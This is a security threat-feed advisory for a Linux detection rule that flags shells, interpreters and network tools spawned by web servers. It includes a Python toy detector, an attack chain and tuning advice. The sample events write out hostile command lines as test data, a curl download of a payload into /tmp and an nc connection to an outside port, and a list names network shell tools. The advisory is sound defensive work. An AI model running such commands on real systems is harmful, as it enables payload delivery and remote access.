Threat Feed
Advisory (severity: low)

Unusual Process Spawned from Web Server Parent

This rule detects unusual processes spawned from a web server parent process on Linux systems, potentially indicating an attacker attempting to establish persistence, execute malicious commands, or establish command and control channels.

This detection rule identifies low-frequency process spawning from web server parent processes on Linux systems. It keys on combinations that are rare for the host, such as an unusual user ID, an unusual working directory, or a parent/child pairing that is seldom seen, which may indicate attacker activity: establishing persistence, executing commands, or opening a command and control channel. The rule analyzes process execution events and looks for shells, scripting interpreters (Python, PHP, Perl, Ruby, Lua) and networking tools (socat, openssl, nc, ncat) spawned by web server processes. The activity is treated as suspicious when it is infrequent and originates from world-writable locations such as /tmp, /var/tmp or /dev/shm, the staging directories attackers favour because the web server's unprivileged user can write there. The rule gives defenders an early signal of a web server compromise and of the post-exploitation activity that follows it.
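The following is an added, self-contained illustration of the logic the paragraph describes, written for this page; it is not the platform's rule, Elastic's query, or the Sigma rule listed below. It runs over a constructed batch of process-creation events (ECS-style dotted field names are assumed; the web server list, suspicious child list, allowlist entry and sample events are all made up for illustration, and 203.0.113.5 is a documentation address). An alert fires when a web server parent spawns a shell, interpreter or networking tool and either the parent/child/user/working-directory combination is rare within the batch or the process runs from /tmp, /var/tmp or /dev/shm; a frequent, non-writable-directory combination such as a CGI handler does not fire, and an allowlisted combination is skipped, mirroring the tuning the recommendations call for.

```python
"""Toy detection: shells, interpreters and networking tools spawned by a
web server parent, flagged when rare in the batch or run from a
world-writable directory.  Added example with assumed field names,
process lists and sample events; not the platform's or Elastic's rule."""
import os
from collections import Counter

WEB_SERVER_PARENTS = {"apache2", "httpd", "nginx", "lighttpd", "caddy", "php-fpm"}
SUSPICIOUS_CHILDREN = {
    "sh", "bash", "dash", "zsh",                        # shells
    "python", "python3", "php", "perl", "ruby", "lua",  # scripting interpreters
    "socat", "openssl", "nc", "ncat", "netcat",         # networking tools
}
WRITABLE_DIRS = ("/tmp", "/var/tmp", "/dev/shm")

# Known-good (parent, child, working directory) combinations, i.e. the
# exceptions the advisory recommends adding. Assumed entry, not from the page.
ALLOWLIST = {("php-fpm", "php", "/var/www/html")}


def in_writable_dir(path):
    """True if path lies inside one of the world-writable staging directories."""
    if not path:
        return False
    p = os.path.normpath(path)
    return any(p == d or p.startswith(d + "/") for d in WRITABLE_DIRS)


def is_web_server_child(event):
    """Parent is a web server and the child is a shell/interpreter/network tool."""
    return (event.get("process.parent.name") in WEB_SERVER_PARENTS
            and event.get("process.name") in SUSPICIOUS_CHILDREN)


def _key(event):
    """Tuple used for frequency counting: parent, child, user, working directory."""
    return (event.get("process.parent.name"), event.get("process.name"),
            event.get("user.name"), event.get("process.working_directory"))


def detect(events, rare_threshold=2):
    """Return one alert per qualifying event whose parent/child/user/cwd
    combination appears at most rare_threshold times in the batch, or whose
    working directory or executable is in a world-writable location."""
    candidates = [e for e in events if is_web_server_child(e)]
    seen = Counter(_key(e) for e in candidates)
    alerts = []
    for e in candidates:
        parent, child, user, cwd = _key(e)
        if (parent, child, cwd) in ALLOWLIST:
            continue
        reasons = []
        if seen[_key(e)] <= rare_threshold:
            reasons.append("rare combination (seen %dx)" % seen[_key(e)])
        if in_writable_dir(cwd) or in_writable_dir(e.get("process.executable")):
            reasons.append("runs from world-writable directory")
        if reasons:
            alerts.append({"parent": parent, "child": child, "user": user, "cwd": cwd,
                           "command_line": e.get("process.command_line"),
                           "reasons": reasons})
    return alerts


def _ev(parent, name, cwd, cmd, exe, user="www-data"):
    """Build one constructed process-creation event."""
    return {"process.parent.name": parent, "process.name": name,
            "process.working_directory": cwd, "process.command_line": cmd,
            "process.executable": exe, "user.name": user}


# Constructed sample batch, not real telemetry.
SAMPLE_EVENTS = (
    # Noisy but legitimate queue worker: covered by ALLOWLIST, never alerts.
    [_ev("php-fpm", "php", "/var/www/html", "php artisan queue:work", "/usr/bin/php")] * 3
    # Frequent CGI handler in the docroot: not allowlisted, but common -> no alert.
    + [_ev("apache2", "perl", "/var/www/cgi-bin", "perl form.cgi", "/usr/bin/perl")] * 4
    + [
        # Shell working from /tmp fetching a payload: rare and world-writable.
        _ev("apache2", "sh", "/tmp", 'sh -c "curl http://203.0.113.5/x -o /tmp/x"', "/bin/sh"),
        # Interpreter running a script staged in /dev/shm.
        _ev("nginx", "python3", "/dev/shm", "python3 /dev/shm/.r.py", "/usr/bin/python3"),
        # Networking tool spawned once by the web server from the docroot: rare only.
        _ev("apache2", "nc", "/var/www/html", "nc 203.0.113.5 4444", "/bin/nc"),
        # Parent is not a web server: ignored entirely.
        _ev("cron", "bash", "/root", "bash /etc/cron.hourly/job", "/bin/bash", user="root"),
    ]
)

if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(a["parent"], "->", a["child"], a["cwd"], "|", "; ".join(a["reasons"]))
```

Running the script prints three alerts (the sh, python3 and nc events) and nothing for the php-fpm and perl events. The rarity check is computed over the batch you pass in; in production the baseline would be a longer window per host, and the threshold is something to tune alongside the allowlist.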

Attack Chain

  1. An attacker gains initial access to a web server through a vulnerability (e.g., file upload, remote code execution).
  2. The attacker leverages the web server process (e.g., Apache, Nginx) to execute a command.
  3. The web server process spawns a shell (e.g., bash, sh) or scripting interpreter (e.g., python, php).
  4. The spawned shell or script is used to download a malicious payload from a remote server using tools like curl or wget.
  5. The downloaded payload is saved to a temporary directory such as /tmp or /var/tmp.
  6. The attacker executes the downloaded payload.
  7. The executed payload establishes persistence using techniques such as cron jobs or systemd services.
  8. The attacker uses the compromised system to establish command and control channels or perform lateral movement.

Impact

A successful attack can lead to the compromise of the web server and potentially other systems on the network. Attackers may gain access to sensitive data, disrupt services, or use the compromised system to launch further attacks, resulting in data breaches, financial losses, and reputational damage. The rule's low severity reflects its confidence, not the impact of a true positive: web servers legitimately spawn CGI handlers, PHP workers and maintenance scripts, so a match needs investigation before it is treated as a compromise. A confirmed true positive means arbitrary command execution as the web server's user, which is a full compromise of that host.

Recommendation

  • Enable Elastic Defend and configure the integration to monitor process execution events on Linux systems, as this rule requires Elastic Defend data.
  • Deploy the Sigma rule “Detect Suspicious Web Server Child Processes” to your SIEM and tune for your environment.
  • Investigate any alerts generated by this rule, focusing on unusual process names, command-line arguments, and working directories.
  • Review the parent process executable to ensure it is a legitimate web server executable.
  • Consider adding exceptions for legitimate processes that may be spawned by the web server.

Detection coverage (2 rules)

Detect Suspicious Web Server Child Processes

Severity: medium

Detects suspicious processes spawned by web server processes on Linux systems, indicating potential persistence or command execution attempts.

Format: Sigma. Tactics: command_and_control, execution, persistence. Techniques: T1059.004, T1505.003. Sources: process_creation, linux.

Detect Unusual Network Connections from Web Servers

Severity: low

Detects suspicious outbound network connections initiated by web server processes.

Format: Sigma. Tactics: command_and_control. Techniques: T1071.001. Sources: network_connection, linux.
